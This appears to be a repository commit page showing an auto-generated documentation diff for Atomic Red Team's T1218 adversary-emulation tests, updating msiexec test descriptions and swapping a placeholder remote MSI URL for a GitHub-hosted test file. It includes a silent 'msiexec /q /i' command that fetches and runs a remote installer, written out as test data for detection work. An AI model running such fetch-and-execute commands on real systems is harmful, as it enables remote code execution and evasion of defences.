security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-03-18 21:46:56 +00:00
parent 74e33cac01
commit c429ff1f08
2 changed files with 11 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1218/T1218.md
+3 -3
View File
@@ -161,7 +161,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #4 - Msiexec.exe - Execute Local MSI file
Execute arbitrary MSI file. Commonly seen in application installation.
Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed.
**Supported Platforms:** Windows
@@ -202,7 +202,7 @@ Write-Host "You must provide your own MSI"
<br/>
## Atomic Test #5 - Msiexec.exe - Execute Remote MSI file
Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution.
Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed.
**Supported Platforms:** Windows
@@ -212,7 +212,7 @@ Execute arbitrary MSI file retrieved remotely. Less commonly seen in application
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| msi_payload | MSI file to execute | String | http://site.com/file.msi|
| msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218.msi|
#### Attack Commands: Run with `command_prompt`!
atomics/index.yaml
+8 -4
View File
@@ -12089,6 +12089,7 @@ defense-evasion:
'
- name: Msiexec.exe - Execute Local MSI file
description: 'Execute arbitrary MSI file. Commonly seen in application installation.
The MSI opens notepad.exe when sucessfully executed.
'
supported_platforms:
@@ -12110,7 +12111,8 @@ defense-evasion:
'
- name: Msiexec.exe - Execute Remote MSI file
description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
in application installation, commonly seen in malware execution.
in application installation, commonly seen in malware execution. The MSI opens
notepad.exe when sucessfully executed.
'
supported_platforms:
@@ -12119,7 +12121,7 @@ defense-evasion:
msi_payload:
description: MSI file to execute
type: String
default: http://site.com/file.msi
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218.msi
executor:
name: command_prompt
command: 'msiexec.exe /q /i "#{msi_payload}"
@@ -24307,6 +24309,7 @@ execution:
'
- name: Msiexec.exe - Execute Local MSI file
description: 'Execute arbitrary MSI file. Commonly seen in application installation.
The MSI opens notepad.exe when sucessfully executed.
'
supported_platforms:
@@ -24328,7 +24331,8 @@ execution:
'
- name: Msiexec.exe - Execute Remote MSI file
description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
in application installation, commonly seen in malware execution.
in application installation, commonly seen in malware execution. The MSI opens
notepad.exe when sucessfully executed.
'
supported_platforms:
@@ -24337,7 +24341,7 @@ execution:
msi_payload:
description: MSI file to execute
type: String
default: http://site.com/file.msi
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218.msi
executor:
name: command_prompt
command: 'msiexec.exe /q /i "#{msi_payload}"